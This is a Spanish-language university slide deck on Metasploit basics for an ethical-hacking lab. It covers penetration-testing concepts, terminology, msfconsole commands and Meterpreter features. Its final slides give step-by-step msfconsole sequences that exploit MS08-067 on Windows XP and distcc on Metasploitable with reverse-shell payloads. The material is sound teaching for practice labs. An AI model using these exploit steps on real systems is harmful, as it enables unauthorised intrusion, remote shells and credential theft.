Metasploit

  • View
    280

  • Download
    1

Embed Size (px)

DESCRIPTION

Metasploit basics

Text of Metasploit

  • 1. METASPLOIT Cristian Alejandro Rojas carojasq@correo.udistrital.edu.co Universidad Distrital Francisco Jos de Caldas

2. Etapas del hacking tico 3. Qu es un test de penetracin? Simulacin de un ataque real Obtener una autorizacinpara hacer el ataque Reportar al cliente los descubrimientos y recomendaciones Encontrar y arreglar vulnerabilidadesantes de que un atacante real las pueda explotar 4. Objetivos en el laboratorio Windows XP SP3 10.20. Ubuntu Linux 8.04Metasploitable 10.20 5. Terminologia Exploit: Vector para penetrar el sistema. Payload: Es la bomba que estalla una vez est adentro del sistema. Encoder: Codificadordel payload. Shellcode: Un set de instrucciones usado como payload. Listener: Escucha para una conexin entrante. Session: Conexin de un exploit exitoso 6. METASPLOIT Framework de explotacin de vulnerabilidades Basado en Ruby Modular Exploits, Payloads, Auxiliaries. 7. Interfaces MSFconsole:Es la mas conocida, provee acceso a la gran mayora de las opciones del framework. (Intecractiva). 8. Interfaces MSFCli: Sirve para correr un ataque directamente desde la consola sin necesidad de ser interactivo. 9. Utilidades MSFPayload:Es capaz de generar un ejecutable con el payload solamente. 10. Interactuando con msfconsole use - Configura el exploit a usar set - Configura un parametro setg - Define un parametro globalmente show - Muestra un (exploits, payloads, options, etc) help - Muestra ayuda acerca de X Info muestra informacin acerca de un mdulo exploit Ejecuta el mdulo seleccionado. 11. Meterpreter Payload Nunca escribe en el disco, solo corre en memoria. Provee comandos con funcionalidades adicionales: help, background,ps, migrate, getuid, download, upload,hashdump, shell. Facilita escalamiento de privilegios (getsystem). 12. Metasploitable Ubuntu 8.08 Entorno para practicar explotacin de vulnerabilidades Vulnerabilidades de sistema operativo y tambin web. 13. Explotando una vulnerabilidad en Windows XP SP3 Ms08_67 -> Vulnerabilidad numero 67 reportada en 2008 aceptada por microsoft. search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 exploit 14. Explotando una vulnerabilidad en metasploitable (Linux) search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (ip local) exploit